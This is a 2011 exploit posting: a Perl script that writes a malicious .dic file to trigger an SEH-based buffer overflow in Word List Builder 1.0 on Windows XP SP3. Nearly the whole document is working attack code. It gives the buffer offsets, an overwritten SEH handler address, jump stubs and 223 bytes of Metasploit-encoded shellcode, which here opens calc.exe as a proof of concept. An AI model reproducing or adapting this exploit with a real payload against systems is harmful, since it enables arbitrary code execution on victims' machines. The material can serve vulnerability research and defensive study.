Word List Builder 1.0 Buffer Overflow (SEH)
Posted on 03 April 2011
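#!/usr/bin/perl
# Exploit Title: Word List Builder Buffer Overflow Exploit(SEH)
# Software Link: http://download.cnet.com/Word-List-Builder/3000-18541_4-10398336.html
# Version: 1.0
# triggering details : open .dic file
# Tested on: Win XP SP3 French
# Date: 31/03/2011
# Author: h1ch4m (Hicham Oumounid)
# Email: h1ch4m@live.fr
# Home: http://net-effects.blogspot.com
#
# Writes a crafted .dic file that overflows a 4108-byte buffer and
# overwrites the SEH record that follows it.  File layout:
#
#   offset    0 : NOP sled (0x90 x 3880)
#   offset 3880 : shellcode (223 bytes)
#   offset 4103 : jmp rel32 -228  -> lands on offset 3880 (shellcode start)
#   offset 4108 : nSEH = jmp short -7 -> lands on offset 4103
#   offset 4112 : SEH  = 0x00402AAF   (pop eax / pop edx / ret in word_builder.exe)
#
# The handler address is taken from word_builder.exe itself, so it is only
# valid for the 1.0 build this was tested against (no ASLR on XP SP3; the
# module is presumably not SafeSEH-compiled, which this listing cannot prove).
# The hex escapes below were restored from a listing that had lost its
# backslashes; byte values are unchanged.
use strict;
use warnings;

my $OUTPUT_FILE = 'exploit.dic';
my $SLED_AND_CODE_SIZE = 4108;   # bytes before the nSEH slot

# windows/exec - 223 bytes
# http://www.metasploit.com
# Encoder: x86/shikata_ga_nai
# EXITFUNC=seh, CMD=calc      (pops calc.exe; proof-of-concept payload only)
my $SHELLCODE =
    "\xda\xdd\xbf\xb0\x1a\x64\x4f\xd9\x74\x24\xf4\x58\x31\xc9" .
    "\xb1\x32\x31\x78\x17\x83\xc0\x04\x03\xc8\x09\x86\xba\xd4" .
    "\xc6\xcf\x45\x24\x17\xb0\xcc\xc1\x26\xe2\xab\x82\x1b\x32" .
    "\xbf\xc6\x97\xb9\xed\xf2\x2c\xcf\x39\xf5\x85\x7a\x1c\x38" .
    "\x15\x4b\xa0\x96\xd5\xcd\x5c\xe4\x09\x2e\x5c\x27\x5c\x2f" .
    "\x99\x55\xaf\x7d\x72\x12\x02\x92\xf7\x66\x9f\x93\xd7\xed" .
    "\x9f\xeb\x52\x31\x6b\x46\x5c\x61\xc4\xdd\x16\x99\x6e\xb9" .
    "\x86\x98\xa3\xd9\xfb\xd3\xc8\x2a\x8f\xe2\x18\x63\x70\xd5" .
    "\x64\x28\x4f\xda\x68\x30\x97\xdc\x92\x47\xe3\x1f\x2e\x50" .
    "\x30\x62\xf4\xd5\xa5\xc4\x7f\x4d\x0e\xf5\xac\x08\xc5\xf9" .
    "\x19\x5e\x81\x1d\x9f\xb3\xb9\x19\x14\x32\x6e\xa8\x6e\x11" .
    "\xaa\xf1\x35\x38\xeb\x5f\x9b\x45\xeb\x07\x44\xe0\x67\xa5" .
    "\x91\x92\x25\xa3\x64\x16\x50\x8a\x67\x28\x5b\xbc\x0f\x19" .
    "\xd0\x53\x57\xa6\x33\x10\xa9\x57\x8e\x8c\x3e\xce\x7b\xed" .
    "\x22\xf1\x51\x31\x5b\x72\x50\xc9\x98\x6a\x11\xcc\xe5\x2c" .
    "\xc9\xbc\x76\xd9\xed\x13\x76\xc8\x8d\xf2\xe4\x90\x51";

# Assemble the file contents.  Returns the raw payload bytes
# (sled . shellcode . jmp-back . nSEH . SEH); dies if the shellcode
# no longer fits in front of the nSEH slot.
sub build_payload {
    my $jump_back = "\xe9\x1c\xff\xff\xff";   # jmp rel32 -228: back to shellcode start
    my $nseh      = "\xeb\xf9\xff\xff";       # jmp short -7: lands on $jump_back
    my $seh       = pack('V', 0x00402AAF);    # pop eax / pop edx / ret [word_builder.exe]

    my $sled_len = $SLED_AND_CODE_SIZE - length($SHELLCODE . $jump_back);
    die "shellcode too large for the $SLED_AND_CODE_SIZE-byte buffer\n" if $sled_len < 0;

    my $sled = "\x90" x $sled_len;
    return $sled . $SHELLCODE . $jump_back . $nseh . $seh;
}

# Write the payload to $OUTPUT_FILE in the current directory.
# Every I/O step is checked: a silently truncated file would just
# look like a non-working exploit.
sub main {
    my $payload = build_payload();

    open my $fh, '>', $OUTPUT_FILE or die "Cannot open $OUTPUT_FILE: $!\n";
    binmode $fh;   # raw bytes; prevents CRLF translation on Windows hosts
    print {$fh} $payload or die "Cannot write $OUTPUT_FILE: $!\n";
    close $fh or die "Cannot close $OUTPUT_FILE: $!\n";

    print "Files Created successfully\n";
    return;
}

main() unless caller;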
